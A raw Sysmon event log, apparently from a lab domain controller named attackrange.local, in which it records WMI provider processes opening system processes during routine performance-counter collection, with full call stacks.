13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005199Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005198Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005197Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005196Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005195Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1600-000000009101}1584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005188Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005187Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005186Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005185Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 